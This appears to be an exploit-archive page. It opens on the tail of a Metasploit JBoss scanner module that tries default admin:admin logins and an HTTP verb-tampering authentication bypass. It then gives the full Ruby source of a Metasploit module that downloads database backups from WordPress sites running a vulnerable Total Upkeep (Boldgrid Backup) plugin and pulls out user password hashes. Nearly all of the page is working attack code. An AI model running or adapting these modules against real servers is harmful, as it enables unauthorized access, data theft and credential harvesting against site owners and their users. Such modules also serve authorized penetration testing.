bypass_auth(app)      basic_auth_default_creds(app)    when res.code == 404      print_status("#{rhost}:#{rport} #{app} not found (404)")    when res.code == 301, res.code == 302      print_status("#{rhost}:#{rport} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")    when res.code == 500 && app == "/invoker/readonly"      print_good("#{rhost}:#{rport} #{app} responded (#{res.code})")    else      print_status("#{rhost}:#{rport} Don't know how to handle response code #{res.code}")    end  end  def jboss_as_default_creds    print_status("#{rhost}:#{rport} Checking for JBoss AS default creds")    session = jboss_as_session_setup(rhost, rport)    return false if session.nil?    # Default AS creds    username = 'admin'    password = 'admin'    res = send_request_raw({      'uri'      => '/admin-console/login.seam',      'method'   => 'POST',      'version'  => '1.1',      'vhost'    => "#{rhost}",      'headers'  => { 'Content-Type'  => 'application/x-www-form-urlencoded',                      'Cookie'        => "JSESSIONID=#{session['jsessionid']}"                    },      'data'     => "login_form=login_form&login_form%3Aname=#{username}&login_form%3Apassword=#{password}&login_form%3Asubmit=Login&javax.faces.ViewState=#{session["viewstate"]}"    })    # Valid creds if 302 redirected to summary.seam and not error.seam    if res && res.code == 302 && res.headers.to_s !~ /error.seam/m && res.headers.to_s =~ /summary.seam/m      print_good("#{rhost}:#{rport} Authenticated using #{username}:#{password} at /admin-console/")      add_creds(username, password)    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  def add_creds(username, password)    service_data = {      address: rhost,      port: rport,      service_name: 'jboss',      protocol: 'tcp',      workspace_id: framework.db.workspace.id    }    credential_data = {      module_fullname: self.fullname,      origin_type: :service,      private_data: password,      private_type: :password,      username: username    }.merge(service_data)    credential_core = create_credential(credential_data)    credential_data[:core] = credential_core    create_credential_login(credential_data)  end  def jboss_as_session_setup(rhost, rport)    res = send_request_raw({      'uri'       => '/admin-console/login.seam',      'method'    => 'GET',      'version'   => '1.1',      'vhost'     => "#{rhost}"    })    unless res      return nil    end    begin      viewstate = /javax.faces.ViewState" value="(.*)" auto/.match(res.body).captures[0]      jsessionid = /JSESSIONID=(.*);/.match(res.headers.to_s).captures[0]    rescue ::NoMethodError      print_status("#{rhost}:#{rport} Could not guess admin credentials")      return nil    end    { 'jsessionid' => jsessionid, 'viewstate' => viewstate }  end  def bypass_auth(app)    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")    res = send_request_raw({      'uri'       => app,      'method'    => datastore['VERB'],      'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering at #{app}")    else      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")    end  end  def basic_auth_default_creds(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain',      'authorization' => basic_auth('admin', 'admin')    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Authenticated using admin:admin at #{app}")      add_creds("admin", "admin")    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  # function stole'd from mssql_ping  def test_connection(ip, port)    begin      sock = Rex::Socket::Tcp.create(        'PeerHost' => ip,        'PeerPort' => port,        'Timeout' => 20      )    rescue Rex::ConnectionError      return :down    end    sock.close    return :up  endend

JBoss Scanner

This Metasploit module exploits an unauthenticated database backup vulnerability in WordPress plugin Boldgrid-Backup also known as Total Upkeep version < 1.14.10. First, env-info.php is read to get server information. Next, restore-info.json is read to retrieve the last backup file. That backup is then downloaded, and any sql files will be parsed looking for the wp_users INSERT statement to grab user creds.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress Total Upkeep Unauthenticated Backup Downloader',        'Description' => %q{          This module exploits an unauthenticated database backup vulnerability in WordPress plugin          'Boldgrid-Backup' also known as 'Total Upkeep' version < 1.14.10.          First, `env-info.php` is read to get server information.  Next, `restore-info.json` is          read to retrieve the last backup file.  That backup is then downloaded, and any sql          files will be parsed looking for the wp_users INSERT statement to grab user creds.        },        'References' => [          ['EDB', '49252'],          ['WPVDB', '10502'],          ['WPVDB', '10503'],          ['URL', 'https://plugins.trac.wordpress.org/changeset/2439376/boldgrid-backup']        ],        'Author' => [          'Wadeek', # Vulnerability discovery          'h00die' # Metasploit module        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [],          'SideEffects' => [IOC_IN_LOGS]        },        'DisclosureDate' => '2020-12-12',        'License' => MSF_LICENSE      )    )  end  def run_host(ip)    unless wordpress_and_online?      fail_with Failure::NotVulnerable, "#{ip} - Server not online or not detected as wordpress"    end    checkcode = check_plugin_version_from_readme('boldgrid-backup', '1.14.10')    unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)      fail_with Failure::NotVulnerable, "#{ip} - A vulnerable version of Boldgrid Backup was not found"    end    print_good("#{ip} - Vulnerable version of Boldgrid Backup detected")    print_status("#{ip} - Obtaining Server Info")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'boldgrid-backup', 'cli', 'env-info.php')    })    fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res    fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Non 200 code received" if res.code != 200    begin      data = JSON.parse(res.body)    rescue StandardError      fail_with Failure::NotVulnerable, "#{ip} - Unable to parse JSON output.  Check response: #{res.body}"    end    output = []    data.each do |k, v|      output << "  #{k}: #{v}"    end    print_good("#{ip} - \n#{output.join("\n")}")    path = store_loot(      'boldgrid-backup.server.info',      'text/json',      ip,      data,      'env-info.json'    )    print_good("#{ip} - File saved in: #{path}")    print_status("#{ip} - Obtaining Backup List from Cron")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'boldgrid-backup', 'cron', 'restore-info.json')    })    fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res    fail_with Failure::NotVulnerable, "#{ip} - No database backups detected" if res.code == 404    fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Non 200 code received" if res.code != 200    begin      data = JSON.parse(res.body)    rescue StandardError      fail_with Failure::NotVulnerable, "#{ip} - Unable to parse JSON output.  Check response: #{res.body}"    end    output = []    data.each do |k, v|      output << "  #{k}: #{v}"    end    print_good("#{ip} - \n#{output.join("\n")}")    path = store_loot(      'boldgrid-backup.backup.info',      'text/json',      ip,      data,      'restore-info.json'    )    print_good("#{ip} - File saved in: #{path}")    unless data['filepath']      print_bad("#{ip} - no file found")    end    # pull a url from the local file system path    path = data['filepath'].sub(data['ABSPATH'], '')    print_status("#{ip} attempting download of #{path}")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, path)    })    fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res    fail_with Failure::NotVulnerable, "#{ip} - Unable to download" if res.code == 404    fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Non 200 code received" if res.code != 200    path = store_loot(      'boldgrid-backup.backup.zip',      'application/zip',      ip,      res.body,      path.split('/').last    )    print_good("#{ip} - Database backup (#{res.body.bytesize} bytes) saved in: #{path}")    Zip::File.open(path) do |zip_file|      # Handle entries one by one      zip_file.each do |entry|        # Extract to file        next unless entry.name.ends_with?('.sql')        print_status("#{ip} - Attempting to pull creds from #{entry}")        f = entry.get_input_stream.read        f.split("\n").each do |l|          next unless l.include?('INSERT INTO `wp_users` VALUES ')          columns = ['user_login', 'user_pass']          table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)          l.split('),(').each do |user|            user = user.split(',')            username = user[1].strip            username = username.start_with?("'") ? username.gsub("'", '') : username            hash = user[2].strip            hash = hash.start_with?("'") ? hash.gsub("'", '') : hash            create_credential({              workspace_id: myworkspace_id,              origin_type: :service,              module_fullname: fullname,              username: username,              private_type: :nonreplayable_hash,              jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),              private_data: hash,              service_name: 'Wordpress',              address: ip,              port: datastore['RPORT'],              protocol: 'tcp',              status: Metasploit::Model::Login::Status::UNTRIED            })            table << [username, hash]          end          print_good(table.to_s)        end      end    end    print_status("#{ip} - finished processing backup zip")  endend

Tag

#js